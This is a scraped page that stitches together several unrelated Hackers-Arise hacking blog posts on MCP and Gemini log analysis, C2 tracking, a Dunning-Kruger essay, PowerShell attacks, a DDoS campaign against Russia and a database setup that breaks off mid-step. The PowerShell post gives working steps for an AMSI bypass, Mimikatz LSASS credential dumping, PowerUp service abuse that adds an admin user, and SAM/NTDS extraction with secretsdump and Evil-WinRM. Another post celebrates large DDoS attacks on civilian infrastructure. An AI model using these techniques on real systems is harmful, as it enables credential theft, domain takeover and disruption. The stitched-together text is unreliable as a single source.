> Read ~/security-ops/logs/auth.log and identify any brute force authentication attempts. Report the attacking IP, number of attempts, timing patterns, and whether the attack was successful.
Let's do something more advanced. We can ask Gemini to correlate events across multiple log files to identify coordinated attack patterns.
> Compare the events in ~/security-ops/logs/waf-access.log and ~/security-ops/logs/auth.log. Do any IP addresses appear in both logs? If so, describe the attack campaign and create a timeline of events.
The AI generated a formatted timeline of the attack showing the progression from SSH attacks to web application attacks, demonstrating how the attacker switched tactics after the initial approach failed.
Summary
MCP, combined with Gemini's AI capabilities, serves as a powerful force multiplier. It enables us to automate routine analysis tasks, instantly correlate data from multiple sources, leverage AI for pattern recognition and threat hunting, and retain full transparency and control over the entire process.
In this tutorial, we configured an MCP server for file system access and tested it using sample logs.
Keep returning, aspiring hackers, as we continue to explore MCP and the application of artificial intelligence in cybersecurity.
One of the key tasks for those defending a country's, institution's, or corporation's assets is to understand what threats exist. This is often referred to as Cyber Threat Intelligence, or CTI. It encompasses understanding what the threat actors (hackers and nation-states) are doing and which of them pose a threat to your organization. In that regard, we have a new tool to identify and track command and control servers, malware, and botnets using telltale fingerprinting from Shodan and Censys.
Command and Control Servers: History, Development & Tracking
In the fast-changing world of cybersecurity, Command and Control (C2) servers have been crucial. These servers are central to many cyber attacks and play a big role in the ongoing fight between offensive and defensive sides. To appreciate modern tools like C2 Tracker, let's look back at the history and development of C2 servers.
Early days
The story of C2 servers starts in the early days of the internet, back in the 1990s. Hackers used Internet Relay Chat (IRC) channels as their first basic command centers. Infected computers would connect to these IRC channels, where attackers could send commands directly. The malware on the compromised systems would then carry out these commands.
The following figure shows the Hoaxcalls bot's C2 communication with its C2 server over IRC.
The Web Era and the Art of Blending In
As detection methods got better, attackers changed their tactics. In the early 2000s, they started using web-based C2 systems. By using HTTP and HTTPS, attackers could hide their C2 traffic as regular web browsing. Since web traffic was everywhere, this method was a clever way to camouflage their malicious activities.
Using basic web servers to manage their command systems also made things simpler for attackers. This period marked a big step up in the sophistication of C2 methods, paving the way for even more advanced techniques.
Decentralization: The Peer-to-Peer Revolution
In the mid-2000s, C2 systems saw a major change with the rise of peer-to-peer (P2P) networks. This shift addressed the weakness of centralized servers, which were easy targets for law enforcement and defensive security teams.
In P2P C2 systems, infected computers talk to each other to spread commands and steal data. This decentralized setup made it much harder to shut down the network. Examples like the Storm botnet and later versions of the Waledac botnet showed how tough this model was to tackle, pushing cybersecurity experts to find new ways to detect and counter these threats.
Machines infected by the Storm botnet:
Hiding in Plain Sight: The Social Media and Cloud Era
In the 2010s, the rise of social media and cloud services brought a new shift in C2 tactics. Cyber attackers quickly started using platforms like Twitter, Google Docs, and GitHub for their C2 operations. This made it much harder to spot malicious activity because commands could be hidden in ordinary tweets or documents. Additionally, using major cloud providers made their operations more reliable and resilient.
The Modern C2 Landscape
Today's C2 systems use advanced evasion techniques to avoid detection. Domain fronting hides malicious traffic behind legitimate, high-reputation websites. Fast flux networks constantly change the IP addresses linked to C2 domains, making it difficult to block them. Some attackers even use steganography to hide commands in images or other harmless-looking files.
One of the latest trends is blockchain-based C2 systems, which use cryptocurrency networks for covert communication. This approach takes advantage of blockchainβs decentralized and anonymous features, creating new challenges for tracking and identifying these threats.
Blockchain transaction diagrams used by the Glupteba botnet
The Rise of C2 Tracking Tools
With C2 servers being so crucial in cyber attacks, developing effective tracking tools has become really important. By mapping out how different attackers set up their C2 systems, these tools provide insights into their tactics and capabilities. This helps link attacks to specific groups and track changes in methods over time.
Additionally, this data helps with proactive threat hunting, letting security teams search for signs of C2 communication within their networks and find hidden compromises. On a larger scale, C2 tracking tools offer valuable intelligence for law enforcement and cybersecurity researchers, supporting takedown operations and the creation of new defense strategies.
C2 Tracker
C2 Tracker is a free, community-driven IOC feed that uses Shodan and Censys searches to gather IP addresses of known malware, botnet, and C2 infrastructure.
This feed is available on GitHub and is updated weekly. You can view the results there or generate them yourself.
Add your Shodan API key as the environment variable SHODAN_API_KEY, and set up your Censys credentials with CENSYS_API_ID and CENSYS_API_SECRET.
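For example:
kali> export SHODAN_API_KEY="your-shodan-key"
kali> export CENSYS_API_ID="your-censys-id"
kali> export CENSYS_API_SECRET="your-censys-secret"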
kali> python3 -m pip install -r requirements.txt
kali> python3 tracker.py
In the data directory, you can see the results:
Let's take a look at some of the IP addresses of GoPhish servers.
Shodan shows that the default port 3333 is open.
When opened, we can see the authorization form.
Now, let's move on to our main objective: finding command and control (C2) servers.
For instance, let's look at the Cobalt Strike IP addresses.
We have 827 results!
Each of these IP addresses represents a Cobalt Strike C2 server.
Summary
Cyber Threat Intelligence is crucial for staying ahead of the bad guys. Tools like C2 Tracker are essential in providing you with a clear picture of the threat landscape. They help by spotting threats early, aiding in incident response, and supporting overall security efforts. These tools improve our ability to detect, prevent, and handle cyber threats.
In the past few years, large language models have moved from isolated research curiosities to practical assistants that answer questions, draft code, and even automate routine tasks. Yet those models remain fundamentally starved for live, organization-specific data because they operate on static training datasets.
The Model Context Protocol (MCP) was created to bridge that gap. By establishing a universal, standards-based interface between an AI model and the myriad external resources a modern enterprise maintains, like filesystems, databases, web services, and tools, MCP turns a text generator into a "context-aware" agent.
Let's explore what MCP is and how we can start using it for hacking and cybersecurity!
Step #1: What is Model Context Protocol?
Model Context Protocol is an open standard introduced by Anthropic that enables AI assistants to connect to systems where data lives, including content repositories, business tools, and development environments. The protocol functions like a universal port for AI applications, providing a standardized way to connect AI systems to external data sources, tools, and workflows.
Before MCP existed, developers faced what's known as the "N×M integration problem." If you wanted to connect five different AI assistants to ten different data sources, you'd theoretically need fifty different custom integrations. Each connection required its own implementation, its own authentication mechanism, and its own maintenance overhead. For cybersecurity teams trying to integrate AI into their workflows, this created an impossible maintenance burden.
MCP replaces these fragmented integrations with a single protocol that works across any AI system and any data source. Instead of writing custom code for each connection, security professionals can now use pre-built MCP servers or create their own following a standard specification.
Step #2: How MCP Actually Works
The MCP architecture consists of three main components working together: hosts, clients, and servers.
The host is the application you interact with directly, such as Claude Desktop, an integrated development environment, or a security operations platform. The host manages the overall user experience and coordinates communication between different components.
Within each host lives one or more clients. These clients establish one-to-one connections with MCP servers, handling the actual protocol communication and managing data flow. The client is responsible for sending requests to servers and processing their responses. For security applications, this means the client handles tool invocations, resource requests, and security context.
The servers are where the real action happens. MCP servers are specialized programs that expose specific functionality through the protocol framework. A server might provide access to vulnerability scanning tools, network reconnaissance capabilities, or forensic analysis functions.
MCP supports multiple transport mechanisms, including standard input/output for local processes and HTTP with Server-Sent Events for remote communication.
The protocol defines several message types that flow between clients and servers.
Requests expect a response and might ask a server to perform a network scan or retrieve vulnerability data. Results are successful responses containing the requested information. Errors indicate when something went wrong, which is critical for security operations where failed scans or timeouts need to be handled gracefully. Notifications are one-way messages that donβt expect responses, useful for logging events or updating status.
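For a concrete sense of the wire format: MCP messages are JSON-RPC 2.0. A request invoking a hypothetical scanning tool, and its result, might look like this (the tool name and arguments are made up for illustration; tools/call is the standard method for tool invocation):
{"jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": {"name": "network_scan", "arguments": {"target": "10.0.0.5"}}}
{"jsonrpc": "2.0", "id": 1, "result": {"content": [{"type": "text", "text": "Host 10.0.0.5 is up; ports 22 and 80 open"}]}}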
Step #3: Setting Up Docker Desktop
To get started, we need to install Docker Desktop. But if you're looking for a bit more privacy and have powerful hardware, you can download LM Studio and run local LLMs.
To install Docker Desktop in Kali Linux, run the following command:
kali> sudo apt install docker-desktop -y
But if you're running Kali in a virtualization app like VirtualBox, you might see the following error:
To fix it, you need to turn on "Nested VT-x/AMD-V".
After restarting the VM and Docker Desktop, you should see the following window.
After accepting, you'll be ready to explore MCP features.
Now, we just need to choose the MCP server to run.
At the time of writing, there are 266 different MCP servers. Let's explore one of them, for example, the DuckDuckGo MCP server, which provides web search capabilities.
Clicking Tools reveals the utilities the MCP server offers and explains each one's purpose in plain language. In this case, there are just two tools:
Step #4: Setting Up Gemini-CLI
By clicking on Clients in Docker Desktop, we can see which LLMs can interact with Docker Desktop.
For this example, I'll be using Gemini CLI. But let's install it first:
kali> sudo apt install gemini-cli
Let's start it:
kali> gemini-cli
To get started, we need to authenticate. If you'd like to change the login option, use the up- and down-arrow keys. After authorization, you'll be able to communicate with the general Gemini AI.
Now, we're ready to connect the client.
After restarting, we can see a message about the connection to MCP.
By pressing Ctrl+T, we can see the MCP settings:
Let's try a search through the DuckDuckGo MCP in Gemini CLI.
After approving the execution, we got the response.
Scrolling through the results, we can see at the end a summary from Gemini AI of the search performed by the DuckDuckGo search engine.
Summary
I hope this brief article introduced you to this fundamentally innovative technique. In this piece, we covered the basics of MCP architecture, set up our own environment, and ran an MCP server. I used a very simple example, but as you saw, there are more than 250 MCP servers in the catalog, and even more on platforms like GitHub, so the potential for cybersecurity and IT in general is huge.
Keep returning as we continue to explore MCP and eventually develop our own MCP server for hacking purposes.
If you've spent any time in cybersecurity, you've probably met someone who sounds absolutely certain they've mastered it all after a few YouTube tutorials. Maybe you've even been that person. That's not arrogance; it is the Dunning-Kruger effect in action.
What the Dunning-Kruger Effect Means
The Dunning-Kruger effect is what happens when people know just enough to overestimate their ability. It's the moment you think you understand a topic, right before you realize how much more there is to learn.
The name comes from psychologists David Dunning and Justin Kruger, who ran a series of studies in the 1990s revealing that people who perform poorly on a task tend to overestimate their performance. Their results showed a simple truth: regardless of skill, most people think their abilities are above average.
The robbers who attempted to evade security cameras with lemon juice inspired the research on the Dunning-Kruger effect
In technology, this shows up in familiar ways. A beginner writes a few lines of Python and claims to have built a revolutionary app. Someone installs a VPN and believes they're "unhackable." Confidence often runs ahead of experience, not out of arrogance, but because the limits of a skill are invisible until you've spent considerable time inside it.
Even advanced practitioners can fall into a quieter version of the same trap. A network engineer might assume their firewall rules cover every scenario, only to discover a misconfigured port exposing internal systems.
Don't Mistake Confidence for Competence
If you're new to cybersecurity, the hardest thing isn't learning the tools, it's learning who to listen to. Many online spaces reward confidence, not accuracy. Forums, Discord channels, and YouTube comments are full of people who sound certain, but certainty is cheap. Real knowledge explains why something works, not just what to do.
Before taking advice, look for someone who admits what they don't know. They're often the ones worth learning from.
The Subtle Curve of Growth
This classic "Mount Stupid" graph paints a neat story: confidence soars, crashes, then climbs again with knowledge. It's a good metaphor, but real growth isn't always that tidy, and self-awareness can develop unevenly.
Progress in cybersecurity isn't about avoiding mistakes; it's about calibrating your confidence to match your understanding. When your ego and your knowledge move in step, your knowledge and understanding deepen.
How to Avoid the Dunning-Kruger Trap
Keep learning even when you feel confident. Real skill isn't a destination, it's maintenance.
Ask for feedback early and often. Don't trust your instincts alone to judge your skill.
Challenge your assumptions. If something feels obvious, double-check it. Most technical errors hide in what "everyone knows."
Watch for loud certainty online. The best experts usually explain, not declare.
Why the Internet Makes It Worse
The internet accelerates the illusion of knowledge. Anyone can Google a few terms, read an AI summary, and start giving advice. The illusion spreads fast when there's no built-in pause between "learning something" and "applying it". Knowing where to click isn't the same as understanding what's happening under the hood.
Don't fall victim to confident AI hallucinations
Listen Critically
If you're just starting out, be careful not to mistake confidence for competence. Online, certainty often outshines understanding. The trick is to listen critically. Ask questions, check sources, and test things yourself. Real understanding holds up under scrutiny. If someone can't explain why something works, they probably don't understand it as well as they think they do.
Keep Learning and Stay Curious
The good news is that most people eventually grow out of Mount Stupid. The best engineers, hackers, and sysadmins are the ones whose competence outpaces their confidence and who aren't afraid to admit when they don't know something. Curiosity replaces confidence, and discussions start sounding more like "What happens if I do this?" instead of "I already know how this works."
In the end, the Dunning-Kruger effect isn't just about ignorance. It's a stage of learning, a rite of passage in everything, including cybersecurity. At Hackers-Arise, we believe in learning through experience, the kind that teaches you persistence and makes you a creative thinker.
If you're ready for your competence to match your confidence, you should start with our Cybersecurity Starter Bundle.
For quite some time we have been covering different ways PowerShell can be used by hackers. We learned the basics of reconnaissance, persistence methods, survival techniques, evasion tricks, and mayhem methods. Today we are continuing our study of PowerShell and learning how to automate it for real hacking tasks such as privilege escalation, AMSI bypass, and credential dumping. As you can see, PowerShell can be used to exploit systems, although it was never created for this purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that are usually done manually can be automated with the help of the scripts we are going to cover. Let's start by learning about AMSI.
AMSI is the Antimalware Scan Interface, a Windows feature that sits between script engines like PowerShell or Office macros and whatever antivirus or EDR product is installed on the machine. When a script or payload is executed, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script-based attacks and malware. Hackers constantly look for ways to keep malicious content from ever being presented to AMSI, or to change the content so it won't match detection rules. You will see many articles and tools that claim to bypass AMSI, but soon after they are released, Microsoft patches the vulnerabilities. Since it's important to be familiar with this attack, let's test our system and try to patch AMSI.
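Before patching anything, it is worth confirming that AMSI is actually inspecting your session. Microsoft publishes a harmless test string for exactly this purpose; if AMSI is active and Defender is watching, simply echoing it gets the line blocked as malicious:
PS > 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
If the string prints back without complaint, AMSI is not scanning your session.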
First, we need to check whether Defender is running on our Russian target:
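One quick way to check is the built-in Get-MpComputerStatus cmdlet (available property names can vary slightly between Windows builds):
PS > Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled, AMServiceEnabled
If RealTimeProtectionEnabled comes back True, assume AMSI is feeding Defender everything you run.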
As you know by now, there are a few ways to execute scripts in PowerShell. We will use a basic one for demonstration purposes:
PS > .\shantanukhande-amsi.ps1
If your output matches ours, then AMSI has been successfully patched. From now on, Defender does not have access to your PowerShell session, and any kind of script can be executed in it without restriction. It's important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell version 2 helps evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions, and these simple tricks will not work.
Since you are free to run anything you want, we can execute Mimikatz right in our session. Note that we are using Invoke-Mimikatz.ps1 by g4uss47, an updated PowerShell version of Mimikatz that actually works. For OPSEC reasons, we do not recommend running Mimikatz commands that touch other hosts, because network security products might pick this up. Instead, let's dump LSASS locally and inspect the results:
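A typical local dump looks like the following, assuming the g4uss47 fork keeps the -Command parameter of the original PowerSploit script, which passes the quoted commands straight to the embedded Mimikatz:
PS > Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"'
Here privilege::debug acquires SeDebugPrivilege, and sekurlsa::logonpasswords reads the credential material LSASS holds for every logged-on session.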
Now we have the credentials of brandmanager. If we compromised a more valuable target in the domain, like a server or a database, we could expect domain admin credentials. You will see this quite often.
Privilege Escalation with PowerUp
Privilege escalation is a complex topic. Systems are frequently misconfigured, and people feel comfortable without realizing the security risks. This may allow you to skip privilege escalation altogether and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors of privilege escalation, but among the most common are unquoted service paths and insecure file permissions. While insecure file permissions can easily be abused by replacing the legitimate file with a malicious one of the same name, unquoted service paths may require more work for a beginner. That's why we will cover this attack today with the help of PowerUp. Before we proceed, it's important to mention that this script has been known to security products for a long time, so be careful.
Finding Vulnerable Services
Unquoted Service Path is a configuration mistake in Windows services where the full path to the service executable contains spaces but is not wrapped in quotation marks. Because Windows treats spaces as separators when resolving file paths, an unquoted path like C:\Program Files\My Service\service.exe can be interpreted ambiguously. The system may search for an executable at earlier, shorter segments of that path (for example C:\Program.exe or C:\Program Files\My.exe) before reaching the intended service.exe. A hacker can place their own executable at one of those earlier locations, and the system will run that program instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.
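PowerUp ships a dedicated check for this misconfiguration. After loading the script into your session, Get-ServiceUnquoted lists every service whose binary path contains an unquoted space:
PS > . .\PowerUp.ps1
PS > Get-ServiceUnquoted
You can also run Invoke-AllChecks to sweep for every escalation vector PowerUp knows about, though it is noisier.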
Now let's test the service names and see which one will get us local admin privileges:
PS > Invoke-ServiceAbuse -Name 'Service Name'
If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.
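Rather than editing the script, you can also override the defaults on the command line; Invoke-ServiceAbuse exposes parameters for the account it creates (the username and password below are placeholders):
PS > Invoke-ServiceAbuse -Name 'Service Name' -UserName 'backup_svc' -Password 'Str0ngP@ss123!' -LocalGroup 'Administrators'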
The results can be tested:
PS > net user john
Now we have an admin user on this machine, which can be used for various purposes.
With enough privileges we can dump NTDS and SAM without having to deal with security products at all, just with the help of native Windows functions. Usually these attacks require multiple commands, as dumping only NTDS or only a SAM hive does not help. For this reason, we have added a new script to our repository. It will automatically identify the type of host you are running it on and dump the needed files. NTDS only exists on Domain Controllers and contains the credentials of all Active Directory users. This file cannot be found on regular machines. Regular machines will instead be exploited by dumping their SAM and SYSTEM hives. The script is not flagged by any AV product. Below you can see how it works.
Attacking SAM on Domain Machines
To avoid issues, bypass the execution policy:
PS > powershell -ep bypass
Then dump SAM and SYSTEM hives:
PS > .\ntds.ps1
Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.
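For context, this step can be reproduced with nothing more than native reg.exe; a minimal sketch of the same idea (the script adds the host detection, directory creation, and error handling described above):
PS > reg save HKLM\SAM C:\Temp\SAM
PS > reg save HKLM\SYSTEM C:\Temp\SYSTEM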
Next we need to exfiltrate these files and extract the credentials:
bash$ > secretsdump.py -sam SAM -system SYSTEM LOCAL
Attacking NTDS on Domain Controllers
If you have already compromised a domain admin, or managed to escalate your privileges on the Domain Controller, you might want to get the credentials of all users in the company.
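The ntds.dit file is always in use while Active Directory is running, so it cannot simply be copied. A minimal sketch of what any dump script must do natively is to pull the file from a Volume Shadow Copy (the shadow copy index depends on what vssadmin reports, and secretsdump.py will also need the SYSTEM hive):
PS > vssadmin create shadow /for=C:
PS > copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
PS > reg save HKLM\SYSTEM C:\Temp\SYSTEM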
We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. Evil-WinRM allows you to load your scripts from your own machine so they are executed in memory without touching the target's disk. It can also patch AMSI, but be really careful.
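A typical session looks like this; the IP, username, and hash are placeholders, and -s points at a local directory of PowerShell scripts that Evil-WinRM serves into the remote session on demand:
bash$ > evil-winrm -i 10.10.10.10 -u Administrator -H <NTLM_HASH> -s ./scripts/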
Evil-WinRM has a download command (download <remote_path> <local_path>) that can help you extract the files. After that, run this command:
bash$ > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL
Summary
In this chapter, we explored how PowerShell can be used for privilege escalation and complete domain compromise. We began with bypassing AMSI to clear the way for running offensive scripts without interference, then moved on to credential dumping with Mimikatz. From there, we looked at privilege escalation techniques such as unquoted service paths with PowerUp, followed by dumping the NTDS and SAM databases once higher privileges were achieved. Each step builds on the previous one, showing how hackers chain small misconfigurations into full organizational takeover. Defenders should also be familiar with these attacks, as it will help them tune their security products. For instance, seemingly harmless actions such as creating a shadow copy to dump NTDS and SAM can be spotted if you monitor Event ID 8193 and Event ID 12298. Many activities can be monitored, even benign ones. It depends on where defenders are looking.
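For defenders who want to act on that, a starting point for hunting those shadow copy events might look like this (assuming the VSS provider writes them to the Application log, which is typical):
PS > Get-WinEvent -FilterHashtable @{LogName='Application'; ProviderName='VSS'; Id=8193,12298}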
In this series, we will detail how an individual or small group of cyberwarriors can impact global geopolitics. The knowledge and tools that YOU hold are a superpower that can change history.
Use it wisely.
To begin this discussion, let's look at the actions of a small group of hackers at the outset of the Russian invasion of Ukraine. We will detail these actions up to the present, attempting to demonstrate that in our connected digital world, even a single individual or small group can influence global political outcomes. Cyber war is real.
Let's begin in February 2022, nearly 3 years ago. At that time, Ukraine was struggling to throw off the yoke of Russian domination. A former member state of the Soviet Union (the successor to the Romanovs' Russian Empire), Ukraine declared its independence from that failed and brutal alliance in 1991, the moment the Soviet Union disintegrated, as did so many other former Soviet republics (Estonia, Latvia, Lithuania, Georgia, Armenia, Kazakhstan, and others). The union failed primarily because the Soviet Union could not meet the needs of its citizens: simple things like food, clean water, and consumer goods. And, of course, there was the tyranny.
Russia, having lost absolute control of these nations, attempted to maintain influence and control by bending their leaders to Putin's will. In Ukraine, this meant a string of leaders who answered to Putin rather than to the Ukrainian people. In addition, Russian state-sponsored hackers, such as Sandworm, repeatedly attacked Ukraine's digital infrastructure to create chaos and confusion within the populace. This included the infamous BlackEnergy3 attack against the Ukrainian power transmission system in December 2015, which blacked out large segments of Ukraine in the depths of winter (for more on this and other Russian cyberattacks against Ukraine, read this article).
In February 2022, the US and other Western intelligence agencies warned of an imminent Russian attack on Ukraine. In an unprecedented move, the US president and the intelligence community revealed, based upon satellite and human intelligence, that Russia was about to invade Ukraine. The new Ukrainian president, Volodymyr Zelenskyy, publicly denied and tried to minimize the probability that an attack was about to take place. Zelenskyy had been a popular comedian and actor in Ukraine (there is a Netflix comedy made by Zelenskyy before he became president named "Servant of the People") and was elected president in a landslide as the people of Ukraine attempted to clean Russian domination from their politics and become part of a free Europe. Zelenskyy may have denied the likelihood of a Russian attack to bolster the public mood in Ukraine and avoid angering the Russian leader (Ukraine and Russia have long family ties on both sides of the border).
We at Hackers-Arise took these warnings to heart and started to prepare.
List of Targets in Russia
First, we enumerated the key websites and IP addresses of critical and essential Russian military and commercial interests. With the attack imminent, there was no time to do extensive vulnerability research on each of those sites, so instead we readied one of the largest DDoS attacks in history! The goal was to disable the Russians' ability to use their websites and digital communications to further their war aims and to cripple their economy. This is exactly the same tactic Russia had used in previous cyber wars against its former republics, Georgia and Estonia. In fact, at the same time, Russian hackers had compromised the ViaSat satellite internet service and were about to send Ukraine and parts of Europe into Internet darkness (read about this attack here).
We put out the word to hackers around the world to prepare, and tens of thousands stood ready to protect Ukraine's sovereignty. When Russian troops crossed the border into Ukraine on February 24, 2022, we were ready. At this point, Ukraine created the IT Army of Ukraine and requested assistance from hackers across the world, including Hackers-Arise.
Within minutes, we launched the largest DDoS attack the Russians had ever seen, over 760 Gbps (as documented later by the Russian telecom provider Rostelecom). This was twice the size of any DDoS attack in Russian history (https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/). It was a coordinated DDoS attack against approximately 50 sites in Russia, such as the Department of Defense, the Moscow Stock Exchange, Gazprom, and other key commercial and military interests.
As a result of this attack, Russian military and commercial interests were hamstrung. Websites were unreachable and communication was hampered. After the fact, Russian government leaders estimated that 17,000 IP addresses had participated and they vowed to exact revenge on all 17,000 of us (we estimated the actual number was closer to 100,000).
This massive DDoS attack, unlike any Russia had ever seen and totally unexpected by Russian leaders, hampered the coordination of military efforts and brought parts of the Russian economy to its knees. The Moscow Stock Exchange shut down and the largest bank, Sberbank, closed. This attack continued for about 6 weeks and effectively sent the message to the Russian leaders that the global hacker/cyberwarrior community opposed their aggression and was willing to do something about it. This was a first in the history of the world!
The attack was simple in the context of DDoS attacks. Most modern DDoS attacks target layer 7 resources to make sites unavailable, but this one simply clogged the pipelines in Russia with "garbage" traffic. It worked. It worked largely because Russia was arrogant and unprepared, lacking adequate DDoS protection from the likes of Cloudflare or Radware.
Within days, we began a new campaign to target the Russian oligarchs, the greatest beneficiaries of Putin's kleptocracy (you can read more about it here). These oligarchs are complicit in robbing the Russian people of their resources and income. They are the linchpin that keeps the murderer, Putin, in power. In this campaign, initiated by Hackers-Arise, we sought to harass the oligarchs in their yachts throughout the world (the oligarchs escape Russia whenever they can). We sought to first (1) identify their yachts, then (2) locate their yachts, and finally (3) send concerned citizens to block their fueling and re-supply. In very short order, this campaign evolved into a program to capture these same superyachts and hold them until the war was over, eventually to be sold to raise funds to rebuild Ukraine. We successfully identified, located, and seized the top 9 oligarch yachts (worth billions of USD), including Putin's personal yacht (this was the most difficult). All of them were seized by NATO forces and are still being held.
In the next few posts, we will detail:
The request from the Ukrainian Army to hack IP cameras in Ukraine for surveillance, and our success in doing so;
The attacks against Russian industrial systems that resulted in damaging fires and other malfunctions.
Look for Master OTW's book, "A Cyberwarrior Handbook", coming in 2026.
Vulnerability scanning is the process of using automated tools to identify potential security weaknesses and vulnerabilities in an organization's infrastructure. It is an essential step in maintaining the security of a system as it helps identify any potential points of attack or entry for malicious actors. In 2023, vulnerability scanning will be more essential than […]
Create the admin database account:
sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y
Create the dc_sonar_workers_layer database account:
sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
Create the dc_sonar_user_layer database account:
sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
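If you prefer a non-interactive setup, the same three roles can be created with equivalent psql one-liners (CREATE ROLE defaults to NOSUPERUSER, NOCREATEDB, and NOCREATEROLE, matching the answers above):
sudo -u postgres psql -c "CREATE ROLE admin LOGIN SUPERUSER;"
sudo -u postgres psql -c "CREATE ROLE dc_sonar_workers_layer LOGIN;"
sudo -u postgres psql -c "CREATE ROLE dc_sonar_user_layer LOGIN;"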
Create the back_workers_db database:
sudo -u postgres createdb back_workers_db
Create the web_app_db database:
sudo -u postgres createdb web_app_db
Run psql:
sudo -u postgres psql
Set a password for the admin account:
ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';
Set a password for the dc_sonar_workers_layer account:
ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';
Set a password for the dc_sonar_user_layer account:
ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';
Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:
\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db TO dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;
Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:
\c web_app_db
GRANT CONNECT ON DATABASE web_app_db TO dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;
Exit psql:
\q
Open the pg_hba.conf file:
sudo nano /etc/postgresql/12/main/pg_hba.conf
Add the following lines to allow connections from the host machine to PostgreSQL, then save the changes and close the file:
# IPv4 local connections:
host    all    all      127.0.0.1/32    md5
host    all    admin    0.0.0.0/0       md5
Open the postgresql.conf file:
sudo nano /etc/postgresql/12/main/postgresql.conf
Change the parameters specified below, then save the changes and close the file: